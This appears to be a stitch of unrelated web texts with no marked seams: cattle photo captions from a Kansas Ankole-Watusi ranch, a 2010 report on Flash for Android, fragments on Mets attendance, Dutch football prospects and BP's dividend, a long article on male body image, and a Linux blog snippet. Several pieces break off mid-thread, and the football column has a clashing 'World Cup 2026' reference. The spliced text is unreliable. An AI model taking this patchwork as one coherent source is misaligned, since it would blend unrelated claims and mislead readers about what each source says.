You lookin ' at me ?
Grace And Sur In The Summer . Sur Loves Attention .
Winter In Kansas Can Be So GRAY .
Grace with Sur. Grace with Sur. Grace with Sur .
Any closer , and I 'll be outside the picture .
hehehe
One of our happy pets .
Hi , Mom , any range cubes on you ?
My camouflage suit works best in the autumn .
You looking at me ?
They 're spray painting the eaves .
Why do you ask ?
You can't see me .
I blend in .
( Foundation Pure Calf ) I may look blonde , but I 'm not stupid .
LOL ( Foundation Pure Cow )
Please compliment the chef .
This hay is exquisite .
( Foundation Pure Cow ) Foundation Pure Cow Foundation Pure Cow La Dorada Virginia Rose , Foundation Pure Cow
You put your left foot in , you take your right foot out ...
Foundation Pure Cow
If I stare at that farmer long enough , a hay bale will appear . ;-)
Foundation Pure Cows
Look deep into my eyes .
Foundation Pure Cow Someone ran out of brown paint .
Native Pure Cow Foundation Pure Cows
I think I found your itchy spot .
Gimme a kiss !
Why , yes , I do hear something odd .
Winter is just shades of gray .
" And for dessert , osage orange tree leaves with a touch of autumn frost . "
Soaking up the last of the autumn sunshine .
" My horns stretch from here to here . "
Foundation Pure Cow " My name is Hot Fudge Sunday . "
" I may be blonde , but I 'm not dumb . "
Native Pure Cow " Last gasp of Summer . " ( Foundation Pure Cow ) Picture Perfect .
( Foundation Pure Cows ) Bright and shiny in the sunshine .
( Foundation Pure Cow )
She 's always sneaking around with a camera .
( Foundation Pure Cow ) La Dorada Zulu , Foundation Pure Cow
There 's that pesky camera - woman again .
( Foundation Pure Cow ) Foundation Pure Cow La Dorada Typhoon , Foundation Pure Bull , 15 Years Old , Poses For His Daily Treats .
Foundation Pure Cow Is Ready For Her Closeup , Mr. DeMille .
" Do n't bother me , lady , it 's breakfast time . "
Foundation Pure Cow Eating Straight Off The Buffet Table .
La Dorada Zulu soaks up the winter sun .
Foundation Pure Cow Foundation Pure Cow Foundation Pure Cow Foundation Pure Cows Foundation Pure Cow Foundation Pure Cow March in Kansas is muddy .
( But hey , it 's rain ! ) Another Foundation Pure Cow Enjoying The Warm March Day Foundation Pure Cows Enjoying The Freshly - Unrolled Hay .
Foundation Pure Cow Yearling Foundation Pure Heifer La Dorada Red Eagle And His Girls La Dorada Red Eagle , Foundation Pure Bull La Dorada Red Eagle , Foundation Pure Bull La Dorada Red Eagle And Foundation Pure Calf Doug With Bwana ( Foundation Pure Bull ) .
Foundation Pure Cows .
Foundation Pure Cow . QCHR Summer Affair , Foundation Pure Cow .
Ridoro Ransom , Foundation Pure Bull .
Ankole - Watusi Brown Swiss Crossbred Cow . La Dorada Red Eagle ( Foundation Pure Bull ) With Two Foundation Pure Cows .
La Dorada Typhoon , Foundation Pure Bull , 14 Years Old. La Dorada Typhoon 's Mojo , Foundation Pure Bull La Dorada Typhoon 's Mojo , FP Bull La Dorada Typhoon , FP Bull , 14 Years Old .
The neighbors love to stop by and feed him range cubes ! ;-)
La Dorada Red Eagle , FP Bull La Dorada Berry , Percentage Steer , Keeps Company With Liz Fritz At The 1991 American Royal Stock Show In KC. La Dorada Sinter Claus , Foundation Pure Bull .
La Dorada Mica , Foundation Pure Bull .
Lucky Loved his Chin Scratches La Dorada Harlequin , Foundation Pure Bull , At Three Years Of Age .
La Dorada Beau Jest , Foundation Pure Bull Everything stops for breakfast !
La Dorada Zulu , FP Cow Time for breakfast !
Foundation Pure Cow Wading Through The Drifts .
Foundation Pure Cows Soaking Up Some Sun In The Drifted Snow .
La Dorada Red Eagle Is Grateful For A Break In The Snow Storms .
La Dorada Red Eagle , Foundation Pure Bull .
La Dorada Red Eagle , Foundation Pure Bull .
Foundation Pure Cow With Foundation Pure Heifer .
La Dorada Zephyr and La Dorada Zulu La Dorada Zulu And Some Calves La Dorada Lucy , 3/4 blood cow Foundation Pure Heifer I think I heard the dinner bell .
La Dorada Lucy , 3/4 Percentage Cow I am one classy bull , and do n't you forget it !
La Dorada Harlequin , Foundation Pure Bull , 3 years Old The famous Push - Me / Pull - You .
Everyone eats at the same time .
I love my baby .
La Dorada Red Eagle rests after a busy day supervising his herd .
La Dorada Lucy , 3/4 Blood Cow .
Two 3/4 Blood Ankole - Watusi .
Yep , this is what passes for shade in Kansas .
Sunny today .
Sunny tomorrow .
No clouds in the forecast .
[ sigh ]
Three year old Foundation Pure bull .
And for my next trick .
( Photo of percentage female . )
That 's far enough .
There 's room for only one of us in here .
My frilly pants are by La Dorada Beau Jest .
Lucky likes the attention .
Foundation Pure Calf
If you do n't have your own thumbs , you have to borrow some .
Foundation Pure Cow Such a cute little girl she is !
3/4 Ankole - Watusi + 1/4 Brown
Swiss cow and her colorful baby .
" That 's it , let 's head south .
Faster !
Faster !! "
The big guy gets the best bed .
LOL " Wise One , I have climbed all this way to ask you a question .
What is the meaning of life ? "
This white stuff is getting to be monotonous .
( Lucky ; Beth Lundgren )
The big guys eat off the top , and the littles eat off the bottom .
And that white stuff gets into the biggest guy 's nose .
LOL
There 's only this fence between me and a Florida beach vacation .
Who 's got the wire - cutters ?
Ridoro Zephyr teaches the yearlings how to navigate the Big World .
Lundgrens Lucky during a gray wintry day .
Foundation Pure cow with newborn calf .
One month old Foundation Pure heifer .
There is always an auntie cow babysitting the youngsters ..
Foundation Pure Cows Lundgren 's Heyday , FP Heifer .
La Dorada Ransom and La Dorada Typhoon , Foundation Pure bulls , pictured at 5 years of age .
Foundation Pure Bull With Two Foundation Pure Cows Foundation Pure Calf Carl Weir Showing A Skull ( QCHR Red Bird , FP Cow ) To Jack And Kathryn Lockard Shhh .
I 'm feeding the baby .
Yes , I 'm adorable .
Now go away !
I keep thinking someone 's sneaking up on me , but I never catch him .
A day - old calf , still getting the hang of it .
LOL Tequila Sunrise , Foundation Pure Cow Native Pure Cow Native Pure Cow La Dorada Red Eagle , Foundation Pure Bull Native Pure Cow QCHR Summer Affair , Foundation Pure Cow Native Pure Cow La Dorada Red Eagle and his lady friend .
Perfectly framed !
Native Pure Cow Hey !
Where did everybody go ?
Dear Diary ,
This is our first date !
These horns are sure make a girl look slim .
I 'm Simply Irresistible !
C'mon , Admit It !
Lundgrens Lucky - Percentage Steer - Picture taken at 15 years of age .
Lucky was perhaps our favorite of the hundreds of Ankole - Watusi we 've owned .
Bottle - raised , halter - broken , and always willing to have his picture taken -- but he was huge ( and knew it ) !
At maturity , his horns were 110 inches long and 26 inches in circumference .
La Dorada Gale ( FP 614 ) - Foundation Pure Cow - 9 Years Old
In an open letter three months ago , Apple CEO Steve Jobs challenged Adobe to ship its Flash software on any mobile device and prove it worked well .
Adobe , now , has an answer .
The company has released Flash Player 10.1 to its mobile partners and the technology should be in the hands of Android phone users with the upcoming Android 2.2 ' Froyo ' update to the operating system .
Flash Player 10.1 will be available as a " final production release " for smart phones and tablets , once users are able to upgrade to Android 2.2 , says Adobe .
Among the devices that will get Froyo and Flash Player 10.1 are the Dell Streak , Google Nexus One , HTC Evo , HTC Desire , HTC Incredible , Motorola Droid , Motorola Milestone and Samsung Galaxy S. Google has n't said yet exactly when Android 2.2 will be available to users , though it is expected in the next few weeks .
Adobe says Flash Player 10.1 will also be available in devices using BlackBerry , webOS , future versions of Windows Phone , MeeGo and Symbian operating systems .
If major Android phones get Flash capability it will be a push back against Apple 's efforts to turn public opinion against Flash on mobile devices .
With the launch of the first iPhone in 2007 , Apple declared war against mobile Flash .
Apple is supporting HTML5 and its efforts have influenced the online video landscape significantly .
Many major websites are starting to use HTML5 , and video players such as Brightcove are serving up HTML5 videos for devices not compliant with Flash .
Separately , Apple has worked with companies like YouTube to produce iPhone - compatible versions of their sites .
" We have routinely asked Adobe to show us Flash performing well on a mobile device , any mobile device , for a few years now .
We have never seen it , " wrote Jobs in a note posted on the Apple website in April .
" Adobe publicly said that Flash would ship on a smartphone in early 2009 , then the second half of 2009 , then the first half of 2010 , and now they say the second half of 2010 .
We think it will eventually ship , but we ’re glad we did n’t hold our breath .
Who knows how it will perform ? "
But many developers are not convinced .
Adobe 's
Flash standard is still widely used on the internet , for everything from animated banner ads and splash screens to infographics , educational content and games .
Much of that content has been unavailable on mobile devices :
The previous version of Adobe 's mobile Flash player , Flash Lite , supported only basic Flash content , such as video .
Gadget Lab 's first look at a Flash Player 10.1 beta showed that Flash on the mobile phone can be fun , unlocking sites that otherwise would be inaccessible .
But it 's not a flawless experience .
On a Nexus One , Flash content – especially video – took time to load , which was frustrating .
And it sucks bandwidth .
Still , for Adobe , it 's a big step toward making Flash a contender in mobile multimedia .
See Also :
Photo : Flash Player 10.1 on a Nexus One phone ( Keith Axline / Wired.com )
In the mid-1990s , Greenberg said , teams could count on new stadiums to help them boost ticket sales for several years , but that trend has ended .
“ Stadium fatigue sets in much faster than it did before , ” Greenberg said , noting that new stadiums built in Baltimore and Cleveland in the early 1990s led to long periods of increased attendance for both franchises .
“ When Camden Yards and Jacobs Field were built , they were a big deal and were a complete change .
The novelty has worn off . ”
The Minnesota Twins are the latest to benefit from the novelty .
The Twins lead the league in increased attendance , with an average of 14,129 more fans attending games at the new Target Field than last season at the Metrodome , according to Baseball - Reference.com .
The Mets tried to prevent a drop - off by cutting ticket prices as much as 20 percent after last season , but signs of trouble quickly became apparent .
When the team submitted its monthly report to the commissioner ’s office in March , ticket sales dropped 40 percent from the same period a year earlier .
Dave Howard , the Mets ’ executive vice president for business operations , blamed the early - season decline on bad weather in April , the team ’s disappointing play in recent years and the economic downturn .
( The weather in April was warmer and drier than normal in the New York area . )
“ We are confident as we continue to play better , the weather gets warmer and school ends that we will draw more fans and end the year fine , ” he said .
Image Gloomy weather has contributed to the Mets ' falling attendance figures this season .
Credit ... Al Bello / Getty Images
It did n’t help that the Mets started the season by losing 8 of their first 12 games before putting together a winning streak at the end of April .
The team is 14 - 8 at home and 18 - 17 over all .
Start with our FREE 4 - Phases of Digital Marketing eBook
Enter your name and email below for instant access …
Get Instant Access !
Get Instant Access !
We value your privacy and would never spam you
However , Gordon Polson , director of the Federation of Bakers , said : " The problem is now the exemption has been omitted from the legislation , it will be very difficult to get it put back in . "
The days of totaalvoetbal are long gone but have always cast a long shadow over the Oranje , never more so than when a tournament comes around .
No other European side are expected to do more than just win their matches ; the Dutch have a brand of football which the world expects to see .
The dominant philosophy at this year 's tournament has been " win at all costs " , while the English have long had an attitude of " it is n't enough to win , others must lose " .
The Netherlands and Brazil are arguably the only remaining nations where the attitude is " win and win well " .
Indeed , the great Uruguayan football philosopher Eduardo Galeano described the Oranje as " the Latin American team I like the best " , before going on to suggest that they were an " orange fire that flitted back and forth , fanned by an all - knowing breeze that sped it forward and pulled it back " .
The class of 2010 may be more pragmatic , with slightly more emphasis on not conceding goals , but the spirit of ' 74 remains part of the national make - up .
They will always be one of the more entertaining sides , even in an era of more conservative football .
Never has an international tournament had quite so many teams that fit Johan Cruyff 's description : " They can never beat you , but you can lose against them . "
To borrow a phrase , Holland in a World Cup are like the proverbial box of chocolates .
Not only do you not know what you are going to get , but they are varied , luxurious , melt in the heat , and the orange one is everybody 's second favourite .
The squad which Bert van Marwijk has assembled are no different ; a temperamental , unpredictable , often flamboyant group of players , with more collective experience than any previous Dutch squad .
What is clear is that this is the last chance for many of their number .
Giovanni van Bronckhorst has already stated that he will retire after the finals .
Andre Ooijer will likely play his final internationals before a move to Roda JC , while Mathijsen , Boulahrouz , Braafheid , Van Bommel and Kuyt will all be the wrong side of 30 by Brazil 2014 .
The Euro 2012 campaign may well see the changing of the guard , but the Dutch will not be hindered as their system remains loosely the same , and the nation produces like - for - like replacements to fit that system .
There are , of course , quality reinforcements in the current squad ( who may or may not have one eye on a British TV broadcasting job come World Cup 2026 ) .
Eljero Elia looked spritely against Denmark and were Van Marwijk a more adventurous coach the young Hamburg winger would certainly start against Japan on Saturday .
Elia won the 2009 Johan Cruyff Prize ( the Eredivisie Young Player of the Year ) while at FC Twente , and earned himself a move to Hamburg last summer .
The transfer to the Bundesliga looks to have settled him , as his form was so good it even earned him a place in the lucrative Honigstein Team of the Season .
Ibrahim Afellay is a relative veteran at 24 , not least because he has been playing regularly for PSV for the last six years .
Equally capable on the wing or in the centre of the park , he is lightning quick , possesses amazing vision and has been attracting attention from Europe 's big guns for some years .
Afellay is joined in South Africa by Gregory van der Wiel , Ajax 's marauding right - back and last season 's Eredivisie Young Player of the Year .
At only 22 , Van der Wiel has attracted favourable comparisons with Michael Reiziger ( when he was good , not the jigsaw - kneed journeyman Middlesbrough fans got ) .
Both Afellay and Van der Wiel are expected to follow Elia out of the Eredivisie this summer , with England a likely destination .
The Eredivisie has been seen as a fertile feeding / breeding ground for English sides for some time , and there are a number of highly rated youngsters already with Premier League clubs .
Chelsea will send the 18 - year - old Jeffrey Bruma on loan next season ( most likely to Twente ) , and his team - mate Patrick van Aanholt may well follow him .
Arsenal look set to sign Kyle Ebecilio , Bruma 's 16 - year - old cousin , to add to their own orange contingent .
It is clear that the future Dutch stars will most likely move abroad , but who are the boys most likely become stars within the Netherlands ?
Jeremain Lens was in the provisional squad for the World Cup , and was unfortunate not to have made the final 23 .
After a successful season in which he managed 12 goals in 20 starts , Lens opted to move from AZ Alkmaar to PSV Eindhoven , where he is seen as the long - term replacement for Danko Lazovic .
The Dutch may also find that they have a ready - made replacement for Mark van Bommel in the 23 - year - old Twente midfielder Wout Brama , already on the fringes of the national side , or Groningen 's tough - tackling Danny Holla .
Brama 's team - mate Luuk de Jong – younger brother of Ajax 's Siem – is expected to take over from Blaise Nkufo in leading the Twente line next season and both brothers are tipped to make an impact .
The fate of the Dutch national side is perennially held in the hands of the two clubs with the finest youth systems in the land .
Ajax and Feyenoord produced more than half of the 1974 World Cup squad and thirteen of the current squad owe some part of their education to one of the two Klassieker rivals .
In the current Feyenoord squad there are two young players who will be lighting up a far bigger stage soon .
Leroy
Fer anchors the Rotterdam side 's midfield , and looks set to develop into an Edgar Davids - style box - to - box midfielder .
Ferocious in the tackle , sensible with possession and capable of driving forward runs , the 20 - year - old has been singled out by his captain , Van Bronckhorst , as one of the best players in the side .
He is joined in midfield by Georginio Wijnaldum , named by Fifa as one of the 40 best young talents in the world .
Wijnaldum was full - back tormentor - in - chief last season , and possesses a Bergkamp - sized bag of tricks , flicks and party pieces .
The 19 - year - old is also deceptively strong and direct , capable of riding challenges and holding off defenders .
If words do n't do justice to his potential , see for yourselves .
Although he has only featured in three games for the men from De club van Zuid , remember the name Luc Castaignos .
As a quick and skilful striker Castaignos has been a revelation for the Dutch Under - 17s squad , finishing top scorer at last year 's European Championship .
In doing so , he broke the all - time goalscoring record for the Dutch at that level , overtaking the tally jointly held by Collins John and Jan Vennegoor of Hesselink .
Of course , being a young talented Dutch striker , he has been scouted by Real Madrid , Liverpool , Manchester United , Internazionale , Arsenal , blah , blah , blah … but a couple of good seasons in the Eredivisie would surely be more beneficial than an early move abroad .
Ajax continue their fine tradition of discovering and nurturing the finest young talent in the world .
In Vurnon Anita they may have unearthed the long - term replacement for Van Bronckhorst .
The young left - back has kept two internationals on the bench this season , and at only 21 he has five years of first - team experience .
Although he was one of the unfortunates cut from the provisional squad for 2010 , Anita will be hoping to be first - choice left - back in time for the 2012 European Championship .
There are also high hopes that Daley Blind can replicate at least some of the success his father , Danny , had at club and country level , while the winger Jeffrey Sarpong has flirted with the first team and spent last year on loan at NEC .
Arguably the finest prospect of all is Siem de Jong , an attack - minded midfielder in the Sneijder / Van der Vaart mould .
De Jong managed 15 goals in 33 appearances in all competitions last year , a record which will not be without admirers .
Of course the best result for the Netherlands could be that these youngsters stay where they are and learn their craft properly , rather than risk moving too early .
Dutch football is always producing " the next big thing " , but such players as Nacer Barazite , Ryan Babel , Marvin Emnes , Vincent van den Berg and Quincy Owusu - Abeyie have risked football purgatory by moving abroad early in their careers .
But , as the saying goes , the future is bright .
The future is …
AS the nightmare oil spill in the gulf of Mexico continues , the potential costs for BP mount .
The company has taken over from the banks as the favoured target of American politicians .
Robert Reich , Bill Clinton 's secretary of labour , has called for the company 's US operations to be put into receivership ; credit default swaps trade as if the company 's bonds are junk .
Today the shares fell 13 % in London .
That has a big impact on the FTSE 100 , since BP is 7 % of market cap .
But the oil company has an even bigger impact for income - seeking investors .
After the big banks slashed their payouts , the market has become more dependent on BP and Shell .
According to Andrew Lapthorne of Societe Generale , BP represents around 12 % of the entire UK dividend .
The current consensus forecast is for a 4 % decline in the dividend and that would be more than compensated by the US dollar 's rise against sterling ( BP pays dividends in dollars ) .
But BP will surely come under pressure to slash its payout by more than that , if only to appease those demanding that the company compensate everyone from shrimp fishermen to owners of beachfront properties .
That would undermine the yield support for the UK market .
The well - built man , complete with six - pack and muscular shoulders , is no longer the ideal male body shape .
But when did men start aspiring to be thin ?
And should we worry ?
Are men more body conscious now than they were 10 years ago ?
Apparently yes .
Infinitely more .
They 're certainly subject to increasingly proscriptive and exaggerated notions on the physical ideal .
Rootstein 's spindly Homme Nouveau shop window mannequin ( 27in waist , 33in chest ) , and Burberry 's fit model , cast according to the equally slender proportions of male model Davo , are merely the latest , most headline - grabbing manifestations of the mounting pressure on men to be a certain – diminished – shape .
Consider , for example , that the average British man has a waist size measuring 39in , and yet American Apparel – spiritual home of anyone hoping they might be even the teensiest bit hip – does n't sell its signature Slim Slack trouser with a waistband larger than 30in .
Consider a significant proportion of contemporary male cultural icons : Russell Brand , Pete Doherty , Matt Smith and David Tennant , Alex Turner of the Arctic Monkeys , Johnny Borrell of Razorlight , nearly all of the Kings of Leon , Nicholas Hoult , any one of the men with whom Kelly Osbourne periodically dallies …
Thin , thin and thinner .
Do men – normal , non-celebrity , non - model men – care ?
Well , yeah – apparently they do .
Incidences of eating disorders in men are on the rise .
In 1990 , 10 % of people suffering from anorexia or bulimia were estimated to be men ; today it 's more like 25 % .
Figures for women have remained steady throughout that time .
Two out of five binge eaters are men .
More and more teenage boys say they are dissatisfied with their bodies .
The male segment of the plastic surgery market is booming – moob jobs are proving especially popular ; in 2009 there was a 44 % year - on - year increase in male breast - reduction procedures .
So yes , men want to be thinner .
Actually – men want to be thin .
And yet traditionally the male physical ideal is the opposite of skinny .
It is athletic , buff , big shouldered , capable .
It has pecs and guns and ripped abdominals .
Until relatively recently , thin men were ashamed , or assumed to be ashamed , of their bodies .
They were considered less masculine by dint of their thinness ; the rare thin male cultural icons – Morrissey , Jarvis Cocker – made thin part of their shtick , an expression of how disenfranchised they felt , how removed from the cultural mainstream .
But now thin is the cultural mainstream .
Thin is desirable .
Men want it – men diet for it .
They go under the knife in pursuit of it .
The skinny man movement began a decade ago , with an ideal created and perpetuated by fashion designer Hedi Slimane .
In 2000 luxury fashion institution Christian Dior appointed Slimane creative director of Dior Homme , its menswear line ; in 2001 Slimane showed his first collection .
It celebrated a gobsmackingly lean silhouette .
Slimane 's aesthetic hinged on razor - sharp , super - tight tailoring ; and jeans so clinging that they almost qualified as meggings ( man leggings ) .
It required a pallid , waifish , concave - chested teenage boy model to do it justice – models Slimane " street cast " by scouting the hipper districts of significant metropolises for Twiglet - form 16 - year - old indie boys .
Slimane 's silhouette gained extraordinary currency – thanks in part to the fact that he made the professionally waifish and ineffably cool Pete Doherty his muse .
It set the fashion world on fire ; fashion elder statesman Karl Lagerfeld was so impressed that in 2001 he lost a third of his body weight – 90lb , more than six stone – for one reason only : " I woke up and decided I was not happy with my physique …
I suddenly wanted to dress differently , to wear clothes designed by Hedi Slimane . "
After that , Slimane 's influence seeped into the non-fashion sphere , reconfiguring the aspirations of a broader market .
Next thing you knew , the streets of our cities were overrun by slender - hipped teenage boys in skinny jeans , their fragile chests visible beneath the plunging " V " on their T - shirts , hoodies dangling off coat hanger - thin shoulders .
Slimane left Dior in 2007 , but the influence of his work for Dior Homme endures .
Skinny is big .
WHICH IS NOT TO SAY that the cultural imperative to be extremely skinny has replaced the cultural imperative for men to be buff .
It has n't .
The muscular male ideal has somehow , simultaneously , remained current .
The publishing miracle that is Men's Health – a monthly men's glossy magazine which boasts robust circulation figures ( more than 250,000 at the last count , the 16th annual increase in circulation ) at a time when other men's titles are floundering – has built its brand on cover image featuring extremely well - toned blokes .
The most successful male model in the world currently is David Gandy , a ridiculously muscular Essex boy who made his name frolicking semi-naked in a rowing boat for a 2007 Dolce & Gabbana perfume ad .
A year ago I interviewed David Gandy about his career .
He told me he had no idea why he was suddenly successful – he'd struggled for a long time to get jobs in a fashion climate that favoured Slimane 's skinny boys .
" No one was using me , and my mum was going : ' I do n't understand why !
You 're so handsome ! '
But I was like : ' Mum .
There is a reason . '
No one wanted the big guys .
It was all the skinny , androgynous look .
People would look at me very , very strangely when I went to castings . "
Other people seemed to know why Gandy 's look had started doing swift business .
Model bookers , advertising execs and fashion editors agreed that a more robust physical ideal resonates culturally during recessions and times of political uncertainty ; the times when we instinctively place more value on men who look like they could take care of themselves .
" We saw exactly this in the last recession – and we also saw it directly after 9/11 .
Clients stop wanting to take risks .
They revert back to basics , to classic ideas of what 's handsome , " said model booker Heidi Beattie of Select , the agency that represents Gandy .
So we 're left with two polarised ideals on masculine beauty .
Hedi Slimane - endorsed skinniness via Homme Nouveau and Davo ; and a strong , muscular , austerity - resistant Gandy - esque form .
These ideals are somehow coexisting , pulling men in two different directions and filling their heads with a general sense that they are nothing if not completely physically imperfect .
Cue eating disorders , a general sense of inadequacy , a new , horrible degree of self - consciousness …
What do women think of all this ?
I 'll be honest : we have to work hard not to cackle , and scream : " Welcome to our nightmare , suckers ! "
We 've been subject to these kinds of pressures for centuries , expected to grow and shrink and entirely redefine our body shape depending on prevailing diktats on what is and is n't hot .
You , men , have not helped us with your endless , casual objectification , your porno - lite lads ' magazines and your inability not to deliver a relentless commentary on every aspect of our physical being .
We 've struggled between polar physical ideals for decades : between the intimidatingly severe and extremely thin architecture of the catwalk model , and the super - tanned , curvaceous obvious pulchritude of the glamour girl .
Relatively , you lot are amateurs at all this .
Do you know what it 's like to turn 12 and find your body subject to the scrutiny of the entire world ?
Do you know what it 's like to be constantly judged by the opposite sex and ( perhaps more harshly ) by your own ?
To be conditioned to view your body in such a way that you regularly find yourself in a public space ( a park , a train carriage , or walking down a street ) rating the legs , or bellies , or upper arms of everyone you pass in terms of the merits and failings of your own ?
Do you know how self - conscious that makes you , how disarmed , how confused , how dissatisfied , how unbelievably freaking vulnerable ?
Oh , hang on !
You do know now !
It is tempting , as women , to respond like this .
But it is n't kind , or even useful ; society functions less well the more time its constituent parts spend fretting about the shape and placement of their bottoms , so let 's not do that .
Let 's instead consider the fact that women are not especially concerned by men's bodies , in and of themselves .
We do n't value buff or skinny in its own right .
I 'm generalising wildly of course – although it's an informed generalisation , based on 20 years at the coalface of men's bodies .
That – and the fact that James Corden is something of a pin-up ; that now - slim actor Seth Rogen is widely believed to have lost his appeal since losing the extra few stone he carried when he made his name as an unlikely romantic hero in 2007's Knocked Up .
Twitter agrees .
I posted a tweet asking female followers how concerned they were by men's bodies , and 60 - odd tweeted back to tell me how much more they valued some configuration of clever , sexy , funny and well - dressed .
Many said muscular bodies were a positive turn - off , hinting at unacceptable levels of vanity ; a few more said they rather liked skinny , although more again said skinny was fine as long as it was n't skinnier than they were .
" As long as his breasts are smaller than mine , he can be skinny or carrying a little extra weight , " said one woman .
" If over 50 , must be fit .
Do n't care about handsome or bald … in fact , love bald , if also nebulously hot … " said another .
" Would forgive any abdominal shortcomings for sexy hands ! " said a third .
Most of us copped unapologetically to rampant heightism .
Women can appreciate a beautiful male body as part of a passable whole .
But a body – whether it is fashionably slender , or Gandy - esque and buff – is certainly not worth more that an attractive face and a winning personality .
Twitter made much mention of the Body of Baywatch , Face of Crimewatch physical phenomenon – all the women who invoked it said they were not prepared to compromise facial beauty for a good body , when looking for a mate , or even when looking for an inconsequential fling .
But if men are not obsessing over their bodies – reshaping them , hating them , wishing they were different , depriving them of food , cutting them up – in response to pressure from women , then why are they doing it ?
Partly , you 'd imagine , because of a general cultural obsession with youth .
Men are not immune to increasing pressure to remain young - looking .
The skinny ideal in particular is a supremely youthful prototype ; barely pubescent .
Rootstein justified its decision to launch the Homme Nouveau mannequin by explaining that it was designed to showcase clothes meant for young teenage boys .
American Apparel has just launched a new trouser style they 've branded the Schoolboy Pant .
But there 's something bigger and more pernicious even than the cult of youth wielding its influence here .
According to Matthew Todd , editor of gay style magazine Attitude : " It 's clear that men are far more objectified than they used to be .
Our bodies have been commercialised .
When I was growing up , it was rare to see half - naked men in advertising ; when you did , it seemed like more of a taboo .
Now the male body is used to promote everything . "
Todd 's absolutely right .
Half of the moodily lit , kinda - erotic images used to sell us things now feature semi-naked men where once they only featured semi-naked women .
Adverts like the Dolce & Gabbana Light Blue perfume film which projected David Gandy to fame ( and also featured a woman – though no one can really remember who she was ) .
The giant billboards filled with increasingly risqué images of sports stars , of Ronaldo , of Kaká , of Becks .
The starkly lit snaps of bearded hip kids which American Apparel favours for its advertising campaigns .
The nameless pretty boys in hairdos and homoerotic poses routinely employed to flog anything from pants to rollerball gizmos designed to diminish unsightly undereye shadows to sunglasses .
In those images , these men – every last one of them , even the celebs – recline , supine .
They are submissive .
They gaze up at the cameras from beneath their eyelashes .
They are beautiful , commercial coquettes ; and they dictate the way we perceive the male form .
Does it matter ?
Yes , it does .
As I 've said , society does n't function brilliantly when significant portions of it are hate their bodies .
While men might better understand the pressure women experience to look a certain way as a consequence of all this , they might also end up too deeply mired in a netherworld of self - loathing to be able to do anything about it .
The increasing prevalence of male eating disorders definitely is n't desirable .
Sam Thomas , project leader of an organisation called Men Get Eating Disorders
Too , says that while eating disorders develop for a complex combination of reasons , and cannot merely be assumed to be the consequence of a new type of shop - window mannequin : " Men are certainly under a lot more pressure to look good , to live up to the latest trends now than they were 10 years ago .
There 's an increased emphasis on male fashion and cosmetics , and this has affected how men perceive their bodies .
It 's made them more conscious of them …
If a man is already feeling insecure about his body , exposure to such ' ideals ' could make him feel inadequate and increase his susceptibility to eating disorders . "
No one wants a manorexia epidemic .
Yet it seems unlikely that this objectification and commercialisation of the male form will abate any time soon .
Actually , it feels like it's only just getting started , gaining pace .
Cristiano Ronaldo's new Emporio Armani underwear shots – released recently , to the rapture of the internet – are the latest evidence of that .
We probably can't stop it ; but the women among us can , at least , stop the vengeful sniping over it .
As Attitude 's Matthew Todd says : " I sometimes hear women say things like : ' It 's great – men can get a taste of how it feels to be objectified as women have been for all eternity . '
But really we should be working on a way to make it so that physicality is not the defining thing about any of us . "
Which , of course , we should .
Instead we seem to be making it the defining thing about all of us .
Burberry 's boy : putting the man into mannequin : Davo McConville describes a casting event
I stand in the centre of a workshop , naked except for skintight cycling shorts , surrounded by model makers .
I 'm coated with six tubs of Nivea moisturiser before layers of plaster are moulded to my body by John and Tristan Schoonraad .
Burberry is shooting coats for a new website .
A plastic mannequin is needed to " model " the clothes , but the existing mannequins are too muscular for the Burberry ideal .
Which is where I come in .
My body will be the model for an all - new skinny mannequin .
I 've been asked before whether I 'm absolutely certain I do n't have an eating problem .
I 'm sure I do n't , but I do have very little meat on my bones .
My body only decided to grow tall and long when I was past 17 and it resists developing muscular bulk .
I 've bought weight equipment ; I 've flirted with sickly protein powders .
Nothing has altered my body .
I am 6ft 1in , with a 35 in chest and a 29in waist , and have the right body for the job .
Even so , I do n't know that anyone would consider my body archetypal or as an exemplar to work towards .
You could n't aim for this ; it 's defined by a vacuum of flesh , by what it 's not .
I 've worked for Burberry before .
I spent an afternoon six years ago having test pieces fitted to my body .
I was a clotheshorse for their fashion then , as I am today .
My body was the point , rather than my face .
Burberry 's ideal is as tall a figure as possible , the slender body lending an elegance and a hint of androgyny to their tailored apparel .
As a model you quickly come to realise the utter objectivity with which others perceive you .
Casting after casting in which one part of your appearance leads to rejection .
Two castings in the last year have seen my body fail on exactly the point which won me this job .
Both Wrangler jeans and Alexander McQueen 's design house thought me too slender for their products ( for Wrangler , my ass was n't big enough ) .
At Elstree , I think back to a conversation with my agent about whether I 'd be happy with naked work .
I 'm sure I said no , though modesty has no place in fashion .
Life - casting goes beyond naked , into the construction of a replica self .
I will leave behind two doppelgangers with removable arms .
Life - sized voodoo dolls .
After being levered out of my second plaster cocoon , I 'm given a plastic safety suit to wear for my walk to the dressing rooms to clean up .
Any misconceived notion that my body might be some kind of ideal is destroyed by the facilities provided .
The shower is too short .
The cubicle is n't broad enough for my shoulders , to the point that I can't reach around to properly remove the dried plaster and Nivea from my pores .
I go home ( never needing to moisturise again ) with the knowledge that there 'll always be a 1:1 edition of me out there .
• This article was amended on 28 July 2010 to remove inaccurate identification of individuals said to have undergone body plaster - casting .
Through thick and thin : why size matters more to some men
Stephen Fry : " I was fed up with having man boobs .
I could see silverback gorillas looking at me with envy . "
Ricky Gervais : " I laugh about being fat , but I should be ashamed .
I should walk down the street and have people shouting : ' Fatty ! '
That 's what I want , to get me out of it . "
Jarvis Cocker : " Why do they call a puny person a weed , when weeds are tenacious plants that grow in adverse circumstances ? "
Gok Wan : " Growing up I was too busy trying to be the life and soul – the big happy fat character who wanted to be fat , wanted to be gay and wanted to be mixed race – to discuss being bullied with anyone . "
Johnny Vegas : " When I 'm out shopping I need XXX size clothes and in America it is the one time in my life that I can glance at people looking at the larger - sized clothing and think to myself : ' How did they let themselves get like that ? ' "
James Corden : " My weight was never a concern for me , because I could make women laugh . "
Will Self : " For a period I was morbidly obese .
I went out with a feeder . "
Alan Carr : " I would n't mind something happening with my back boobs – they hang over the chair like a cape . "
Will Young : " I look bigger than I used to , but I feel like a man , so I quite like it . "
Audio device discussion will follow shortly .
Helmets may be required .
Blog of helios is n't a game review blog ... it's a blog to discuss Linux - related stuff and to keep you posted on The HeliOS Project goings - on .
Some have asked why we cover games as much as we do .
Some have complained loudly .
It 's simple .
When a game developer ports their work to Linux , it 's news .
At least in the Linux World .
Linux users are hungry for games .
The slashdotting of our coverage of the Linux port of World of Goo and Penumbra should be an indication of the importance placed on Linux ports .
Or not ... slow news days happen .
